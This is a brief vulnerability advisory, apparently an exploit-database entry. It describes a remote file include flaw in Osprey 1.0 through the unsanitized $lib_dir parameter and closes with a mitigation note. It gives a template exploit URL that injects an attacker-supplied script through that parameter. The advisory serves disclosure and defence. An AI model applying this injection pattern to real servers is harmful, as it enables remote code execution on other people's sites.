vendor:
osprey
by:
Kw3[R]Ln
N/A
CVSS
N/A
Remote File Include
CWE
Product Name: osprey
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2006
Osprey <= 1.0 [lib_dir] Remote File Include Vulnerability
Variable $lib_dir not sanitized. When register_globals=on an attacker can exploit this vulnerability with a simple php injection script. The exploit URL is http://www.site.com/[path]/web/lib/xml/oai/GetRecord.php?lib_dir=[Evil_Script]
Mitigation:
Ensure that register_globals is turned off and properly sanitize user input